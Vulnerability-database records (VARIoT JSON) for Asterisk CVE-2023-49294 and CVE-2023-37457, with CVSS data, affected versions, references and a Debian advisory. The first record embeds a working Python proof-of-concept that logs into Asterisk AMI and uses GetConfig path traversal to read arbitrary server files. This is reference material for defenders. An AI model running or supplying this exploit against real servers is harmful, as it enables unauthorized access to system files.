https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/\n\n\nimport argparse\nimport getpass\nimport socket\nimport sys\n\n\nCVE_ID = \u0027CVE-2023-49294\u0027\n\nDEFAULT_PORT = 5038\nDEFAULT_FILE = \u0027/etc/hosts\u0027\nDEFAULT_ACTION_ID = 0\nDEFAULT_TCP_READ_SZ = 1048576 # 1MB\n\n\n\ndef ami_msg(action, args, encoding=\u0027utf8\u0027):\n assert type(action) == str, f\u0027Invalid type for AMI Action (expected string): {type(action)}\u0027\n assert type(args) == dict, f\u0027Invalid type for AMI arguments (expected dict): {type(args)}\u0027\n if \u0027ActionID\u0027 not in args:\n args[\u0027ActionID\u0027] = 0\n line_sep = \u0027\\r\\n\u0027\n data = f\u0027Action: {action}{line_sep}\u0027\n for a in args:\n data += f\u0027{a}: {args[a]}{line_sep}\u0027\n data += line_sep\n return data.encode(encoding)\n\n\n\ndef tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ):\n assert type(data) in (bytes, bytearray, memoryview), f\u0027Invalid data type (expected bytes): {type(data)}\u0027\n sock.sendall(data)\n resp = b\u0027\u0027\n while not resp.endswith(b\u0027\\r\\n\\r\\n\u0027):\n resp += sock.recv(read_sz)\n return resp\n\n\n\nif __name__ == \u0027__main__\u0027:\n # Parse command-line arguments\n argparser = argparse.ArgumentParser()\n argparser.add_argument(\u0027host\u0027, type=str, help=\u0027The host name or IP address of the Asterisk AMI server\u0027)\n argparser.add_argument(\u0027-p\u0027, \u0027--port\u0027, type=int, help=f\u0027Asterisk AMI TCP port (default: {DEFAULT_PORT})\u0027, default=DEFAULT_PORT)\n argparser.add_argument(\u0027-u\u0027, \u0027--user\u0027, type=str, help=f\u0027Asterisk AMI user\u0027, required=True)\n argparser.add_argument(\u0027-P\u0027, \u0027--password\u0027, type=str, help=f\u0027Asterisk AMI secret\u0027, default=None)\n argparser.add_argument(\u0027-f\u0027, \u0027--file\u0027, type=str, help=f\u0027File to read (default: {DEFAULT_FILE})\u0027, default=DEFAULT_FILE)\n argparser.add_argument(\u0027-a\u0027, \u0027--action-id\u0027, type=int, help=f\u0027Action ID (default: {DEFAULT_ACTION_ID})\u0027, default=DEFAULT_ACTION_ID)\n if \u0027-h\u0027 in sys.argv or \u0027--help\u0027 in sys.argv:\n print(f\u0027Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \\nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\\n\u0027, file=sys.stderr)\n argparser.print_help()\n sys.exit(0)\n args = argparser.parse_args()\n\n # Validate command-line arguments\n assert 1 \u003c= args.port \u003c= 65535, f\u0027Invalid port number: {args.port}\u0027\n args.host = socket.gethostbyname(args.host)\n if args.password is None:\n args.password = getpass.getpass(f\u0027[PROMPT] Enter the AMI password for {args.user}: \u0027)\n\n print(f\u0027[INFO] Proof of concept exploit for {CVE_ID}\u0027, file=sys.stderr)\n print(f\u0027[INFO] Connecting to Asterisk AMI: {args.user}@{args.host}:{args.port}\u0027, file=sys.stderr)\n\n # Connect to the Asterisk AMI server\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.connect((args.host, args.port))\n\n # Read server banner\n banner = sock.recv(DEFAULT_TCP_READ_SZ)\n print(f\u0027[INFO] Connected to {banner.decode(\"utf8\").strip()}\u0027, file=sys.stderr)\n\n # Authenticate to the Asterisk AMI server\n login_msg = ami_msg(\u0027Login\u0027, {\u0027Username\u0027:args.user,\u0027Secret\u0027:args.password})\n login_resp = tcp_send_rcv(sock, login_msg)\n while b\u0027Authentication\u0027 not in login_resp:\n login_resp = tcp_send_rcv(sock, b\u0027\u0027)\n if b\u0027Authentication accepted\u0027 not in login_resp:\n print(f\u0027\\n[ERROR] Invalid credentials: \\n{login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n sys.exit(1)\n #print(f\u0027[INFO] Authenticated: {login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n print(f\u0027[INFO] Login success\u0027, file=sys.stderr)\n\n # Obtain file data via path traversal\n traversal = \u0027../../../../../../../../\u0027\n cfg_msg = ami_msg(\u0027GetConfig\u0027, {\n \u0027ActionID\u0027: args.action_id,\n \u0027Filename\u0027: f\u0027{traversal}{args.file}\u0027,\n #\u0027Category\u0027: \u0027default\u0027,\n #\u0027Filter\u0027: \u0027name_regex=value_regex,\u0027,\n })\n resp = tcp_send_rcv(sock, cfg_msg)\n while b\u0027Response\u0027 not in resp:\n resp = tcp_send_rcv(sock, b\u0027\u0027)\n\n print(f\u0027\u0027, file=sys.stderr)\n print(f\u0027{resp.decode(\"utf8\")}\u0027)\n\n if b\u0027Error\u0027 in resp:\n sys.exit(1)\n\n pass # Done\n \n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1 security@debian.org\nhttps://www.debian.org/security/ Markus Koschany\nJanuary 04, 2024 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nCVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-37457\n\n The \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed\n the available buffer space for storing the new value of a header. By doing\n so this can overwrite memory or cause a crash. This is not externally\n exploitable, unless dialplan is explicitly written to update a header based\n on data from an outside source. If the \u0027update\u0027 functionality is not used\n the vulnerability does not occur. \n\nCVE-2023-38703\n\n PJSIP is a free and open source multimedia communication library written in\n C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n higher level media transport which is stacked upon a lower level media\n transport such as UDP and ICE. Currently a higher level transport is not\n synchronized with its lower level transport that may introduce a\n use-after-free issue. This vulnerability affects applications that have\n SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n transport other than UDP. This vulnerability\u2019s impact may range from\n unexpected application termination to control flow hijack/memory\n corruption. \n\nCVE-2023-49786\n\n Asterisk is susceptible to a DoS due to a race condition in the hello\n handshake phase of the DTLS protocol when handling DTLS-SRTP for media\n setup. This attack can be done continuously, thus denying new DTLS-SRTP\n encrypted calls during the attack. Abuse of this vulnerability may lead to\n a massive Denial of Service on vulnerable Asterisk servers for calls that\n rely on DTLS-SRTP. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-49294"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "PACKETSTORM",
"id": "177819"
},
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-49294",
"trust": 2.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-020239",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "177819",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "176383",
"trust": 0.1
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "PACKETSTORM",
"id": "177819"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"id": "VAR-202312-2340",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.75
},
"last_update_date": "2024-08-14T14:30:07.750000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.0
},
{
"problemtype": "Path traversal (CWE-22) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-8857-hfmw-vg8f"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#l3757"
},
{
"trust": 1.8,
"url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
},
{
"trust": 1.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
},
{
"trust": 0.1,
"url": "https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/{cve_id}\\n\u0027,"
},
{
"trust": 0.1,
"url": "https://asterisk.org/"
},
{
"trust": 0.1,
"url": "https://docs.asterisk.org/asterisk_18_documentation/api_documentation/ami_actions/getconfig/"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
},
{
"trust": 0.1,
"url": "https://www.debian.org/security/faq"
},
{
"trust": 0.1,
"url": "https://security-tracker.debian.org/tracker/asterisk"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "PACKETSTORM",
"id": "177819"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"db": "PACKETSTORM",
"id": "177819"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"date": "2024-03-28T14:16:21",
"db": "PACKETSTORM",
"id": "177819"
},
{
"date": "2024-01-05T14:31:02",
"db": "PACKETSTORM",
"id": "176383"
},
{
"date": "2023-12-14T20:15:52.730000",
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-01-16T02:49:00",
"db": "JVNDB",
"id": "JVNDB-2023-020239"
},
{
"date": "2023-12-29T00:15:49.930000",
"db": "NVD",
"id": "CVE-2023-49294"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Path traversal vulnerabilities in products from multiple vendors such as",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020239"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "info disclosure",
"sources": [
{
"db": "PACKETSTORM",
"id": "177819"
}
],
"trust": 0.1
}
}
VAR-202312-1059
Vulnerability from variot - Updated: 2024-08-14 14:30Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the 'update' functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the 'update' functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa. Digium of Asterisk Classic buffer overflow vulnerabilities exist in products from multiple vendors.Information is tampered with and service operation is interrupted (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq
Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033
Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.
CVE-2023-38703
PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.
CVE-2023-49294
It is possible to read any arbitrary file even when the `live_dangerously`
option is not enabled.
CVE-2023-49786
Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP.
For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.
We recommend that you upgrade your asterisk packages.
For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202312-1059",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "lte",
"trust": 1.0,
"vendor": "digium",
"version": "20.5.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "16.8.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "18.9"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "19.0.0"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "21.0.0"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 1.0,
"vendor": "digium",
"version": "18.20.0"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "sangoma",
"version": "13.13.0"
},
{
"model": "asterisk",
"scope": null,
"trust": 0.8,
"vendor": "digium",
"version": null
},
{
"model": "certified asterisk",
"scope": null,
"trust": 0.8,
"vendor": "sangoma",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Debian",
"sources": [
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 0.1
},
"cve": "CVE-2023-37457",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2023-37457",
"impactScore": 4.2,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2023-37457",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.2,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2023-37457",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2023-37457",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2023-37457",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-37457",
"trust": 0.8,
"value": "High"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
},
{
"db": "NVD",
"id": "CVE-2023-37457"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk versions 18.20.0 and prior, 20.5.0 and prior, and 21.0.0; as well as ceritifed-asterisk 18.9-cert5 and prior, the \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed the available buffer space for storing the new value of a header. By doing so this can overwrite memory or cause a crash. This is not externally exploitable, unless dialplan is explicitly written to update a header based on data from an outside source. If the \u0027update\u0027 functionality is not used the vulnerability does not occur. A patch is available at commit a1ca0268254374b515fa5992f01340f7717113fa. Digium of Asterisk Classic buffer overflow vulnerabilities exist in products from multiple vendors.Information is tampered with and service operation is interrupted (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1 security@debian.org\nhttps://www.debian.org/security/ Markus Koschany\nJanuary 04, 2024 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nCVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-38703\n\n PJSIP is a free and open source multimedia communication library written in\n C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n higher level media transport which is stacked upon a lower level media\n transport such as UDP and ICE. Currently a higher level transport is not\n synchronized with its lower level transport that may introduce a\n use-after-free issue. This vulnerability affects applications that have\n SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n transport other than UDP. This vulnerability\u2019s impact may range from\n unexpected application termination to control flow hijack/memory\n corruption. \n\nCVE-2023-49294\n\n It is possible to read any arbitrary file even when the `live_dangerously`\n option is not enabled. \n\nCVE-2023-49786\n\n Asterisk is susceptible to a DoS due to a race condition in the hello\n handshake phase of the DTLS protocol when handling DTLS-SRTP for media\n setup. This attack can be done continuously, thus denying new DTLS-SRTP\n encrypted calls during the attack. Abuse of this vulnerability may lead to\n a massive Denial of Service on vulnerable Asterisk servers for calls that\n rely on DTLS-SRTP. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-37457"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "PACKETSTORM",
"id": "176383"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-37457",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2023-020247",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "176383",
"trust": 0.1
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-020247"
},
{
"db": "PACKETSTORM",
"id": "176383"
},
{
